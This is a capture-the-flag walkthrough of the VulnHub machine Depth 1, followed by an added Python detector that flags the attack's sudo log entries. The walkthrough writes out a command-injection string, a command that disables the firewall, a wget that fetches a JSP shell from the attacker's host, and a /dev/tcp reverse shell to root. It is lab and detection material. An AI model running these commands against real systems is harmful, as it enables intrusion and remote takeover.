Depth 1 – CTF Walkthrough
Depth 1 is a relatively new machine that surfaced on VulnHub on October 27th, 2017. It was created by Dan Lawson. It can be downloaded from https://www.vulnhub.com/entry/depth-1,213/
The objective of the machine is to gain root privileges and read the flag.
I will be using Kali 2017.1 as my attacking machine running on VirtualBox, and I will be running the victim machine, Depth 1, on VirtualBox as well.
Once booted, this is what the machine looks like:
After going through so many machines, I like the fact that the IP is displayed on the login.
Since we have the IP, let’s scan and see which ports are open:
As we can see, an Apache Tomcat server is running on port 8080. Let’s head over there and see what’s happening:
I tried basic username and password combinations to log in via the Manager web app, but nothing worked:
I also tried using auxiliary/scanner/http/tomcat_mgr_login via Metasploit, but even that did not work:
I then decided to run Nikto to see whether it would show me something I could use:
And it did. I went back to the web app and opened the file:
When I tried the command mentioned on the page, it returned a directory listing of the /tmp folder:
Exploring further, I see that the user bill has an ssh directory and a file called sudo_as_admin_successfull. When scanning for ports, however, I could not find port 22 open, which could mean that there is a firewall in place:
Before dealing with that, I want to check the path of this page and see if there’s a way I can upload a JSP shell to it:
I run the following command to check the permissions:
sh -c $@|sh . echo ssh bill@localhost sudo -l
The first thing I do is disable the firewall by:
sh -c $@|sh . echo ssh bill@localhost sudo ufw disable
Now that the firewall is down, it is time to upload a JSP shell.
I used the code from the following site: https://blog.netspi.com/hacking-with-jsp-shells/ and saved it as shell.jsp on my Desktop.
Next, I start a simple python HTTP server to host the file:
I will be uploading the file to the path where test.jsp is hosted, which is: /var/lib/tomcat8/webapps/ROOT/
Next, I type the following command in test.jsp to upload the JSP shell:
sh -c $@|sh . echo ssh bill@localhost sudo wget "http://10.0.2.15:8000/shell.jsp" -O /var/lib/tomcat8/webapps/ROOT/shell.jsp
and as you can see, our shell.jsp has been uploaded successfully:
Now it’s time to get a remote connection:
and on the shell, we write:
ssh bill@localhost sudo bash -i>& /dev/tcp/10.0.2.15/4444 0>&1
and we are root!! Here’s the flag:
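Every privileged step in this walkthrough went through sudo as bill over SSH with no terminal attached, which leaves a recognizable trail in the sudo log. The following Python script is an added example, not part of the original walkthrough: it parses sudo syslog lines and flags the three actions used above (ufw disable, a write into the Tomcat webapps directory, an interactive shell with no TTY). The log lines, hostname, timestamps and rule names are constructed for illustration and assume sudo's default syslog line format.

```python
import re

# Constructed sample lines in sudo's default syslog format (not captured from the Depth VM).
SAMPLE_LOG = """\
Nov  5 10:12:01 depth sudo:     bill : TTY=unknown ; PWD=/home/bill ; USER=root ; COMMAND=/usr/sbin/ufw disable
Nov  5 10:14:40 depth sudo:     bill : TTY=unknown ; PWD=/home/bill ; USER=root ; COMMAND=/usr/bin/wget http://10.0.2.15:8000/shell.jsp -O /var/lib/tomcat8/webapps/ROOT/shell.jsp
Nov  5 10:16:02 depth sudo:     bill : TTY=unknown ; PWD=/home/bill ; USER=root ; COMMAND=/bin/bash -i
Nov  5 11:30:00 depth sudo:     bill : TTY=pts/0 ; PWD=/home/bill ; USER=root ; COMMAND=/usr/bin/apt update
"""

SUDO_RE = re.compile(
    r"sudo:\s+(?P<user>\S+) : TTY=(?P<tty>\S+) ; PWD=(?P<pwd>\S+) ; "
    r"USER=(?P<runas>\S+) ; COMMAND=(?P<cmd>.+)$"
)

# Hypothetical rule names, each mapped to a predicate over one parsed sudo event.
RULES = {
    "firewall_disabled": lambda e: re.search(r"\bufw\s+disable\b", e["cmd"]) is not None,
    "write_to_tomcat_webroot": lambda e: re.search(
        r"/var/lib/tomcat\d*/webapps/\S+\.(jsp|war)\b", e["cmd"]) is not None,
    # sudo logs TTY=unknown when it is invoked without a terminal (e.g. "ssh host sudo ...").
    "interactive_shell_without_tty": lambda e: e["tty"] == "unknown"
        and re.search(r"/(ba)?sh\s+-i\b", e["cmd"]) is not None,
}

def parse_sudo_line(line):
    """Return the fields of a sudo syslog line as a dict, or None if it is not one."""
    m = SUDO_RE.search(line)
    return m.groupdict() if m else None

def detect(log_text):
    """Return (rule_name, user, command) for every sudo event that matches a rule."""
    findings = []
    for line in log_text.splitlines():
        event = parse_sudo_line(line)
        if event is None:
            continue
        for name, matches in RULES.items():
            if matches(event):
                findings.append((name, event["user"], event["cmd"]))
    return findings

if __name__ == "__main__":
    for name, user, cmd in detect(SAMPLE_LOG):
        print(f"[{name}] user={user} cmd={cmd}")
```

The redirection to /dev/tcp never shows up in the sudo log because it is applied by the calling shell, so the third rule keys on an interactive shell started without a TTY instead.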